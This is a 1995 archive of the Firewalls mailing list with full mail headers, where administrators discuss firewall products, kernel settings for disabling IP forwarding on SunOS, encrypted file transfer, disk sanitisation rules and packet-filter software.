X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett sez >Am sure that they have the same goals for firewalls as they had for viruses. Cheers, whistles, applause... Warren From firewalls-owner Mon Aug 7 05:28:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA13985 for firewalls-outgoing; Mon, 7 Aug 1995 04:31:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA13941 for ; Mon, 7 Aug 1995 04:31:34 -0700 From: F.Wetzels@amc.uva.nl Received: from amccca.amc.uva.nl(145.18.202.35) by miles via smap (V1.3) id sma013844; Mon Aug 7 04:30:30 1995 Received: from amcnol.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01HTSKJVLWUO000D4W@amc.uva.nl>; Mon, 7 Aug 1995 13:29:08 MET Received: from amchelix.amc.uva.nl by amcnol.amc.uva.nl (5.0/SMI-5.0) id AA19462; Mon, 7 Aug 1995 13:29:05 +0200 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA00464; Mon, 7 Aug 1995 13:29:04 +0200 Date: Mon, 07 Aug 1995 13:29:04 +0200 Subject: Re: IP translation in Firewall-1 To: firewalls@greatcircle.com Message-id: <9508071129.AA00464@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com Content-transfer-encoding: 7BIT Content-length: 587 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk fpmw> Is there anybody know if the Firewall-1 (release 1.2.1) can do fpmw> IP-translation. That means it can remap the internal networks' IPs to fpmw> the Firewall's IP. And, most important, it can prevent static route loops when using one (cisco) router and secure nets. Frank. ------------------------------------------------- F.P.M. Wetzels ADIV/CNS D01-329 wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662916 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Mon Aug 7 05:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA14261 for firewalls-outgoing; Mon, 7 Aug 1995 04:46:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA14245 for ; Mon, 7 Aug 1995 04:46:33 -0700 Received: from cbisgate.cbis.com(155.90.248.205) by miles via smap (V1.3) id sma014239; Mon Aug 7 04:46:01 1995 Received: from notes (notes.cbis.com) by cbisgate.cbis.com (4.1/SMI-4.1) id AA28695; Mon, 7 Aug 95 07:44:34 EDT Received: by notes (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AB0210; Mon, 07 Aug 95 07:46:03 -0700 Message-Id: <9508071446.AB0210@notes> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 9B56113B523C1CC185256211003F291D; Mon, 7 Aug 95 07:46:03 To: firewalls-digest From: Warren Moore Date: 7 Aug 95 7:44:06 EDT Subject: Re: InfoSec policies made easy? X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jim Carroll says: >I was cleaning up around my desk when I came across a promo entitled >"Information Security Policies Made Easy". Dang near forgot about >this. I'll forward noteworthy points for comment: ...snip... >The price is (or at least *was*) US$495. If the general feeling is a >positive one, I'll post The Gory Commercial Details. :P This book has been around for 3 or 4 years now. If you happen to be a member of the Computer Security Institute, you've been seeing excerpts from it in each issue of their newsletter. IMHO, it would be a decent *starting* point if you had absolutely nothing in place, and didn't have the time or inclination to dig up all the stuff yourself. If you're in that situation, then it's probably worth it...however, there's little likelihood that you wouldn't have to modify the policies for your own location. Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. From firewalls-owner Mon Aug 7 11:52:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23249 for firewalls-outgoing; Mon, 7 Aug 1995 11:21:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23121 for ; Mon, 7 Aug 1995 11:20:50 -0700 From: strata@virtual.net Received: from virtual-city.virtual.net(140.174.91.20) by miles via smap (V1.3) id sma023036; Mon Aug 7 11:19:51 1995 Received: by virtual.net (4.1/SMI-4.1) id AA29847; Mon, 7 Aug 95 11:25:19 PDT Date: Mon, 7 Aug 95 11:25:19 PDT Reply-To: strata@virtual.net To: firewalls@greatcircle.com, support@checkpoint.com Subject: Firewall-1 Message-Id: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to thank the folks who pointed out that Firewall-1 is currently at 1.2.1, I will be looking at a current copy soon. I am investigating why a certain SF Bay reseller handed me 1.0.7c as "the latest copy" less than 60 days ago, and will put them in touch with support@checkpoint.com. I apologize to the folks at Checkpoint for not talking to them first, generally I trust my resellers to have economic incentive to give me current products. Cheers, _Strata PS- and yes, I know that the situation I was trying to set up can be IP spoofed, I was trying to test a subset of what I wanted to do rather than a sole component of a production firewall handling of FTP. But thanks also to the folks who pointed that out. ************************************************************************* PGP-- Phil Gets Prosecuted (Persecuted?) Support the Zimmerman Legal Legal Defense Fund ==> Email: zldf@clark.net http://www.netresponse.com/zldf ************************************************************************* INTERNET Installations, Training, Publishing, Security M. Strata Rose 408-733-UNIX (8649) strata@virtual.net ************************************************************************* From firewalls-owner Mon Aug 7 13:00:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26198 for firewalls-outgoing; Mon, 7 Aug 1995 12:35:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26119 for ; Mon, 7 Aug 1995 12:35:40 -0700 Received: from ns1.infonautics.com(199.99.164.5) by miles via smap (V1.3) id sma026065; Mon Aug 7 12:34:44 1995 Received: from adminsrv.infonautics.com by ns1.infonautics.com (4.1/3.1.090690-Infonautics Corporation-ELAW-S1S4special) id AA14956; Mon, 7 Aug 95 15:33:29 EDT Received: from spock (spock.softeng.infonautics.com [199.99.164.43]) by adminsrv.infonautics.com (8.6.11/8.6.11) with ESMTP id OAA05802 for ; Mon, 7 Aug 1995 14:33:40 -0500 Received: (bobb@localhost) by spock (8.6.11/8.6.11) id TAA06701 for firewalls@greatcircle.com; Mon, 7 Aug 1995 19:33:21 GMT From: "Bob Bracalente -- MRJ" Message-Id: <9508071533.ZM6699@spock.softeng.infonautics.com> Date: Mon, 7 Aug 1995 15:33:21 -0400 X-Mailer: Z-Mail (3.1.0 22feb94 MediaMail) To: firewalls@greatcircle.com Subject: using suns/sunos for gateway host(s) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to ~The Firewall Book~, things like IP forwarding and IP source routing should be disabled on gateway hosts used to construct a firewall. I called sun tech support, and not surprisingly they didn't have a clue how to modify the 4.1.3 kernel to acheive this. If anyone could give me some pointers, I'd appreciate it. Thanks, Bob From firewalls-owner Mon Aug 7 13:35:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28063 for firewalls-outgoing; Mon, 7 Aug 1995 13:18:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28040 for ; Mon, 7 Aug 1995 13:18:11 -0700 Received: from kant.newsedge.com(192.206.82.2) by miles via smap (V1.3) id sma028031; Mon Aug 7 13:18:02 1995 Received: from herne.newsedge.com by newsedge.com (4.1/SMI-4.1) id AA06355; Mon, 7 Aug 95 16:12:47 EDT Date: Mon, 7 Aug 95 16:19:40 EST Message-Id: <9508071619.AA17676@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: Firewall-1 X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Original-From: strata@virtual.net Original-Date: Mon, 7 Aug 95 11:25:19 PDT >I would like to thank the folks who pointed out that Firewall-1 is currently >at 1.2.1, I will be looking at a current copy soon. I am investigating why a >certain SF Bay reseller handed me 1.0.7c as "the latest copy" less than 60 >days ago, and will put them in touch with support@checkpoint.com. Check out: http://www.checkpoint.com/free.html It details a free upgrade offered by checkpoint to 1.2.1 With a free upgrade it's even more of a bummer that they couldn't be bothered to ship you latest code. Regards, Chris From firewalls-owner Mon Aug 7 13:38:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26339 for firewalls-outgoing; Mon, 7 Aug 1995 12:38:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26315 for ; Mon, 7 Aug 1995 12:38:44 -0700 Received: from mail.crl.com(165.113.1.22) by miles via smap (V1.3) id sma026258; Mon Aug 7 12:37:48 1995 Received: from mail.maritz.com by mail.crl.com with SMTP id AA22736 (5.65c/IDA-1.5 for ); Mon, 7 Aug 1995 12:22:22 -0700 Received: by smtpgate with Microsoft Mail id <30268450@smtpgate>; Mon, 07 Aug 95 14:23:28 PDT From: "Crandall, John" To: "'Firewalls'" Subject: Re: InfoSec policies made easy? - YES!! Date: Mon, 07 Aug 95 14:21:00 PDT Message-Id: <30268450@smtpgate> Encoding: 33 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I missed the beginning of this thread, can someone provide me more information on Cresson's book? TIA, John Crandall crandaje@maritz.com ---------- From: firewalls-owner To: firewalls Subject: Re: InfoSec policies made easy? - YES!! Date: Sunday, August 06, 1995 6:09PM [stuff deleted] Cressons's book, which I won't call a bible, but its within arms reach as I type this, does releive you of an __awful__ lot of detail work in writing policies. You can go to a client with this and have better than 85% of the work addressed. Not done; not covered, just addressed. Think of it as a well fleshed out "boilerplate". [more stuff deleted] Good book. Go Buy it. -- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Mon Aug 7 14:58:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00163 for firewalls-outgoing; Mon, 7 Aug 1995 14:20:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00141 for ; Mon, 7 Aug 1995 14:20:31 -0700 Received: from noc4.dccs.upenn.edu(128.91.254.39) by miles via smap (V1.3) id sma000133; Mon Aug 7 14:19:49 1995 Received: from POBOX.UPENN.EDU by noc4.dccs.upenn.edu id AA00354; Mon, 7 Aug 95 17:02:13 -0400 Received: from [130.91.74.27] by pobox.upenn.edu id RAA01174; Mon, 7 Aug 1995 17:02:03 -0400 Date: Mon, 7 Aug 1995 17:02:03 -0400 Posted-Date: Mon, 7 Aug 1995 17:02:03 -0400 Message-Id: <199508072102.RAA01174@pobox.upenn.edu> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: millar@pobox.upenn.edu (Dave Millar) Subject: Host protection with ipfilterd? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Someone has asked me if it is appropriate to use ipfilterd to filter access to their SGI host residing on a campus subnet. My take on it is that ipfilterd is appropriate if you want to dedicate your SGI as a router to filter packets between an internal subnet and an external network/subnet, but that it is not the right tool for protecting the SGI host *itself*. Seems to me like tcp wrappers and portmapper are the proper tools for host-based filtering (with the caveat that such filtering is not as comprehensive or flexibled as router-based packet filtering, can only address filtering services "mediated" through either inetd or rpc, and therefore can not address filtering other services such as UDP, ICMP, etc.) I assume the same would hold true for screend as well. Am I on the right track, here? _________________________________________________ Dave Millar University Information Security Officer 3401 Walnut St., Suite 265C Philadelphia, PA 19104-6228 University of Pennsylvania For security matters: security@isc.upenn.edu (read by Data Admin. staff) Other matters: millar@pobox.upenn.edu voice: (215) 898-2172 fax: (215) 898-1729 For PGP 2.6 Public key: http://www.upenn.edu/security-privacy/ PGP Fingerprint: 28 FB 09 DC C7 96 C2 53 1A B8 BE 3B 73 32 46 4C From firewalls-owner Mon Aug 7 15:00:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29355 for firewalls-outgoing; Mon, 7 Aug 1995 13:59:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29333 for ; Mon, 7 Aug 1995 13:59:24 -0700 Received: from soscorp.soscorp.com(204.52.248.130) by miles via smap (V1.3) id sma029320; Mon Aug 7 13:59:07 1995 Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com (2.28/8.6.12/8.6.4.287) with BSMTP id BS0016022/QAA16023; Mon, 7 Aug 1995 16:57:26 -0400 Received: from dauntless.soscorp.com (dauntless.soscorp.com [204.52.249.141]) by fearless.soscorp.com (8.6.10/8.6.4.287) with ESMTP id QAA14511; Mon, 7 Aug 1995 16:56:59 -0400 Received: from dauntless.soscorp.com by dauntless.soscorp.com (8.6.10/SMI-4.1) id QAA13038; Mon, 7 Aug 1995 16:56:55 -0400 Message-Id: <199508072056.QAA13038@dauntless.soscorp.com> To: guido@spooky.lss.cp.philips.com (Guido van Rooij) cc: firewalls@greatcircle.com In-Reply-To: Subject: Re: smap with ESMTP size extension Date: Mon, 07 Aug 1995 16:56:49 -0400 From: Seth Robertson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article , Guido van Rooij wrote: >Has someone already extended the TIS fwtk's smap progrma with >ESMTP size extensions? Freestone's (and obviously Brimstone's) mail proxy supports ESMTP with the size extension. It thus also allows you to place administrative limits on maximum message size and the minimum amount of free disk space that must be maintained. There is no theoretical reason why you couldn't stick the Freestone mail proxies on a otherwise fwtk system since there need be no interaction between mail processing and the more generic proxy services--though obviously we would just as soon that you switch totally to Freestone :-) For more information on Freestone, see http://www.soscorp.com/products/Freestone.html ---- Seth Robertson voice: +1 800 SOS UNIX +1 212 686 5700 SOS Corporation fax: +1 212 686 5703 461 5th Avenue, 16th floor email: seth@soscorp.com New York, NY 10017 http://www.soscorp.com/ From firewalls-owner Mon Aug 7 15:32:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02634 for firewalls-outgoing; Mon, 7 Aug 1995 15:01:47 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02609 for ; Mon, 7 Aug 1995 15:01:42 -0700 Received: from sentinet.demon.co.uk(158.152.140.128) by miles via smap (V1.3) id sma002586; Mon Aug 7 15:01:19 1995 Received: (from smap@localhost) by bastion.sentinet.demon.co.uk (8.6.12/8.6.12) id VAA02131 for ; Mon, 7 Aug 1995 21:34:47 GMT Received: from server.sentinet.demon.co.uk(192.9.105.100) by bastion.sentinet.demon.co.uk via smap (V1.3) id sma002128; Mon Aug 7 21:34:20 1995 Received: from server.sentinet.demon.co.uk (lyndond@[127.0.0.1]) by server.sentinet.demon.co.uk (8.6.12/8.6.12) with ESMTP id WAA04815 for ; Mon, 7 Aug 1995 22:34:18 +0100 Message-Id: <199508072134.WAA04815@server.sentinet.demon.co.uk> To: firewalls@greatcircle.com Subject: Encripted ftp connections Date: Mon, 07 Aug 1995 22:33:01 +0100 From: Lyndon David Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear All, I have been tasked with setting up an ftp server to communicate with a handfull of business partners. We wish to have the ability for our partners to be able to send and retrieve files from our server. Due to the nature of the data the data must be encripted as it passes over the Internet and stong authentication must be used when they connect. This is a commercial project and the data will cross International bounderies, for this reason I do not want to use encription technology such as pgp as some of the countries will have problems with this. I see two solutions, to encript the data, a hardware encription device is placed at each remote site so that the data is encripted between the remote and local machine or mandate in the security policy that the data is encripted before it is transmitted. In either case the stong authentication could be done with one time hand held authentication devices. Questions: Does anyone know of a hardware solution that can operate between one local machine and 5 or 6 remote machines? Is it possible to use a software solution where the data between ftp client and server is encripted by the client server? If encription of the data before transmission is mandated what commercial encription can be used that will be acceptable across International boarders and can anyone think of a method where if someone forgot to encript the data before transmission this would be caught and the transfer stopped? Please reply via email, I will sumarise the answers and post then back to the list. Thanks Lyndon From firewalls-owner Mon Aug 7 17:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA08312 for firewalls-outgoing; Mon, 7 Aug 1995 16:32:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA08284 for ; Mon, 7 Aug 1995 16:32:03 -0700 Received: from ilinx.bctel.net(204.174.66.10) by miles via smap (V1.3) id sma008229; Mon Aug 7 16:31:06 1995 Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Mon, 7 Aug 95 16:29 PDT Message-Id: From: brian@ilinx.ilinx.com (Brian J. Murrell) Date: Mon, 7 Aug 1995 16:29:47 -0700 (PDT) Subject: Re: Encripted ftp connections To: lyndond@sentinet.demon.co.uk Cc: firewalls@greatcircle.com In-Reply-To: <199508072134.WAA04815@server.sentinet.demon.co.uk> Reply-To: brian@ilinx.bctel.net X-Mailer: Ishmail 1.1-950728-386 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of Lyndon David on scroll <199508072134.WAA04815@server.sentinet.demon.co.uk> > Dear All, > > I have been tasked with setting up an ftp server to > communicate with a handfull of business partners. We > wish to have the ability for our partners to be able > to send and retrieve files from our server. Due to the > nature of the data the data must be encripted as it passes > over the Internet and stong authentication must be used > when they connect. You want a VPN (Virtual Private Network). Look through the archives, as there has been plenty of pointers in the last week to products that do VPN. As well as lot's of discussion in the past, I'm sure. > This is a commercial project and the data will cross > International bounderies, for this reason I do not want > to use encription technology such as pgp as some of the > countries will have problems with this. This is going to bite whether you pre-encrypt, or encrypt in the data stream. b. -- Brian J. Murrell brian@ilinx.com InterLinx Support Services, Inc. brian@wimsey.com North Vancouver, B.C. 604 983 UNIX Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD From firewalls-owner Mon Aug 7 17:30:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11120 for firewalls-outgoing; Mon, 7 Aug 1995 17:21:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11088 for ; Mon, 7 Aug 1995 17:21:48 -0700 Received: from pao.translation.com(204.30.204.3) by miles via smap (V1.3) id sma011082; Mon Aug 7 17:21:27 1995 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id RAA19137; Mon, 7 Aug 1995 17:21:13 -0700 Date: Mon, 7 Aug 1995 17:21:13 -0700 Message-Id: <199508080021.RAA19137@translation.com> Received: from unknown(204.30.204.114) by pao via smap (V1.3mjr) id sma019131; Mon Aug 7 17:20:43 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Bob Bracalente -- MRJ" , firewalls@GreatCircle.COM From: afoss@translation.com (Andrew Foss) Subject: Re: using suns/sunos for gateway host(s) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk adb -k -w /vmunix /dev/mem ip_forwarding?x (if this returns 01 it's on) ip_forwarding/w 0 (turns it off in /dev/mem, your running image) ip_forwarding?w 0 (turns it off in /vmunix so it'll be off next reboot) ^d (exits adb) At 12:33 PM 8/7/95 -0700, Bob Bracalente -- MRJ wrote: >According to ~The Firewall Book~, things like IP forwarding and IP source >routing should be disabled on gateway hosts used to construct a firewall. > >I called sun tech support, and not surprisingly they didn't have a clue how to >modify the 4.1.3 kernel to acheive this. > >If anyone could give me some pointers, I'd appreciate it. > >Thanks, > >Bob > > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Mon Aug 7 18:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11852 for firewalls-outgoing; Mon, 7 Aug 1995 17:36:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11831 for ; Mon, 7 Aug 1995 17:36:03 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by miles via smap (V1.3) id sma011823; Mon Aug 7 17:35:36 1995 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id KAA14711 (8.6.12/IDA-1.6); Tue, 8 Aug 1995 10:34:22 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Miles-950430-1) id KAA11842; Tue, 8 Aug 1995 10:34:19 +1000 From: Julian Assange Message-Id: <199508080034.KAA11842@suburbia.net> Subject: Re: Encripted ftp connections To: brian@ilinx.bctel.net Date: Tue, 8 Aug 1995 10:34:18 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Brian J. Murrell" at Aug 7, 95 04:29:47 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 287 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > This is a commercial project and the data will cross > > International bounderies, for this reason I do not want > > to use encription technology such as pgp as some of the > > countries will have problems with this. > Use SSL ftp/ftpd. ftp://ftp.psy.uq.oz.au/pub/Crypto/* -Proff From firewalls-owner Mon Aug 7 18:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA13606 for firewalls-outgoing; Mon, 7 Aug 1995 18:24:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA13570; Mon, 7 Aug 1995 18:24:10 -0700 Received: from uucp5.netcom.com(163.179.3.5) by miles via smap (V1.3) id sma013559; Mon Aug 7 18:23:40 1995 Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id SAA11624; Mon, 7 Aug 1995 18:17:23 -0700 Received: from lat3.lat.com (lat2) by lat.com (4.1/SMI-4.1/LAT.COM-950317-1) id AA24605; Mon, 7 Aug 95 18:12:45 PDT Date: Mon, 7 Aug 95 18:53:36 PDT From: "Jeffrey S. Yunker" Subject: RE: Firewalls-Digest V4 #468 To: firewalls-digest@GreatCircle.COM, Firewalls@GreatCircle.COM X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: nabadm@odo.acdnj.itt.com (set chaos/total) Date: Sun, 6 Aug 1995 10:11:49 -0400 Subject: Re: Sanitizing SCSI disks > Use Norton Wipedisk. Overwrite three times... that'll clear the media enough > so that it can be deamed "unclassified." However, it *STILL* must remain in > the DOD inventory for two years being *USED* in an unclassified mode before > it can be released to the public. (The destruction certificate must also > remain with the computer for two years.) > This is approved up to and including TS. That may have been true under the ISM, but the ISM has now been superseded by the NISPOM. According to the NISPOM "Clearing and Sanitization Matrix", pages 8-3-5 and 8-3-6, it is no longer possible to sanitize TS. All TS material must be destroyed. (NISPOM stands for "National Industrial Security Program Operating Manual". ISM stands for "Industrial Security Manual". True statement. The new NISPOM allows overwrites ONLY up to secret. However, the NISPOM exclusively pertains to government contractors. Procedures adopted by gov't contractors need to be approved site by site. Approval authority comes through the Defense Investigative Service. (DIS) The DIS is regional, so in practice, things approved at a contractor site in the northeast may not be approved in the southwest, and vise versa. DoD entities all have their own guidelines. AF: AFSSM 5020; Navy: OPNAVINST 5510.1H; Army: AR380-19; and the DoD's "Orange Book" DoD 5200.28-STD for example. ________________________________________________________________ _| _| _|_|_|_|_| Jeff Yunker, Sales Manager _| _|_| |_ Los Altos Technologies, Inc. _| _|_|_| |_ jeff@lat.com, www.lat.com _|_|_|_| _| |_ |_ 415/988-4848, 415/988-4860(fax) From firewalls-owner Mon Aug 7 23:30:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA20889 for firewalls-outgoing; Mon, 7 Aug 1995 23:04:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA20864 for ; Mon, 7 Aug 1995 23:04:06 -0700 Received: from vugon.vista.ac.za(196.13.2.16) by miles via smap (V1.3) id sma020858; Mon Aug 7 23:03:07 1995 Received: from weasel.vista.ac.za (weasel.vista.ac.za [196.13.20.20]) by vugon.vista.ac.za (8.6.9/8.6.9) with SMTP id IAA04459 for ; Tue, 8 Aug 1995 08:01:37 +0200 Received: from WLK/SpoolDir by weasel.vista.ac.za (Mercury 1.12); Tue, 8 Aug 95 8:01:42 GMT+2 Received: from SpoolDir by WLK (Mercury 1.12); Tue, 8 Aug 95 8:00:50 GMT+2 From: "Sam Lubbe" Organization: Vista University - Welkom To: firewalls@greatcircle.com Date: Tue, 8 Aug 1995 08:00:26 GMT+2 Subject: Priority: normal X-mailer: Pegasus Mail v3.22 Message-ID: <150417B6A78@weasel.vista.ac.za> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk leave firewalls Sam Lubbe From firewalls-owner Mon Aug 7 23:43:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA20995 for firewalls-outgoing; Mon, 7 Aug 1995 23:18:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA20987 for ; Mon, 7 Aug 1995 23:18:06 -0700 Received: from xwing.wcape.gov.za(164.151.101.253) by miles via smap (V1.3) id sma020985; Mon Aug 7 23:17:58 1995 Received: from cncjnk.wcape.gov.za (cncjnk.wcape.gov.za [164.151.188.247]) by xwing.wcape.gov.za (8.6.11/8.6.12) with SMTP id IAA07948 for ; Tue, 8 Aug 1995 08:16:52 +0200 Received: from CNCJNK/MAILQ by cncjnk.wcape.gov.za (Mercury 1.13); Tue, 8 Aug 95 8:18:23 +0200 Received: from MAILQ by CNCJNK (Mercury 1.13); Tue, 8 Aug 95 8:18:16 +0200 From: "CASSIDY MEYER" Organization: Western Cape Scientific Services To: firewalls@greatcircle.com Date: Tue, 8 Aug 1995 08:18:08 +0200 Subject: iWay-One Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Message-ID: <187A644343@cncjnk.wcape.gov.za> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everyone Have anyone ever heard of a product called iWay-One? It supposedly acts as a firewall running on a server connected to a router on one end and a LAN on the other, screening all incoming/outgoing traffic. Are there any similar products on the market or available as freeware? What other options do I have besides looking at a server based firewall product, to protect my LAN? Thanks in advance. Cassidy From firewalls-owner Tue Aug 8 00:31:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA22951 for firewalls-outgoing; Tue, 8 Aug 1995 00:13:31 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA22895 for ; Tue, 8 Aug 1995 00:13:23 -0700 Received: from arthur.crpht.lu(158.64.4.8) by miles via smap (V1.3) id sma022881; Tue Aug 8 00:13:11 1995 Received: from cnsmac3.crpht.lu by arthur.crpht.lu with SMTP (1.37.109.4/16.2) id AA26060; Tue, 8 Aug 95 09:11:57 +0200 X-Sender: security@arthur.crpht.lu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 8 Aug 1995 09:14:48 +0200 To: Firewalls@GreatCircle.COM From: security@crpht.lu (Bruno MAMER) Subject: Re: InfoSec policies made easy? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Since it seems to interest people, I remind you all that some policies are available on our site : http://www.crpht.lu/CNS/html/PubServ/Security/documents.html Hope this was short enough Bruno ____________________________________________________________________________ Computing and Network Services (CNS) Centre de Recherche Public Henri Tudor Our local archive on security : http://www.crpht.lu/CNS/html/PubServ/ps_home.html ---------------------------------------------------------------------------- From firewalls-owner Tue Aug 8 01:00:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23453 for firewalls-outgoing; Tue, 8 Aug 1995 00:26:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23437 for ; Tue, 8 Aug 1995 00:26:36 -0700 Received: from medoc.medoc-ias.u-psud.fr(194.57.34.46) by miles via smap (V1.3) id sma023433; Tue Aug 8 00:26:18 1995 Received: (from detzel@localhost) by medoc.medoc-ias.u-psud.fr (8.6.9/8.6.9) id JAA07877; Tue, 8 Aug 1995 09:16:46 +0200 Date: Tue, 8 Aug 1995 09:16:46 +0200 From: Vincent DETZEL Message-Id: <199508080716.JAA07877@medoc.medoc-ias.u-psud.fr> To: dmurphy@cwa.com Subject: Re: Sparc2 as a 3-way packet filter? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk dmurphy wrote: >I've picked up the ipfilter package from Darren Reed, which looks to be >pretty much what I think I need, and the newest version of screend I was >able to find (dated April 1990). Any experiences with either of these two >packages, or pointers to other SW solutions, would be appreciated. Hi ! I'm in the same situation and It's pretty difficult to make up my mind whether using screend or ip-fil : - screend seems to be well-suited (fonctionnality, documentation, portability, etc, ...) despite the fact it's quite old. - as for ip-fil (ftp:coombs.anu.edu.au/pub/net/kernel/ip-fil2.7.3.tar.gz) it appears to me that it begins to be widely choosed and as a matter of fact, many changes applied on this package every week (last release dated : Aug 1). Does it mean that ip-fil is going to become much more efficient and fonctionnal than screend ? Any Comments/Suggestions ? Thanks ! -vincent From firewalls-owner Tue Aug 8 01:26:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23158 for firewalls-outgoing; Tue, 8 Aug 1995 00:19:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23122 for ; Tue, 8 Aug 1995 00:19:29 -0700 Received: from relay.philips.nl(130.144.65.1) by miles via smap (V1.3) id 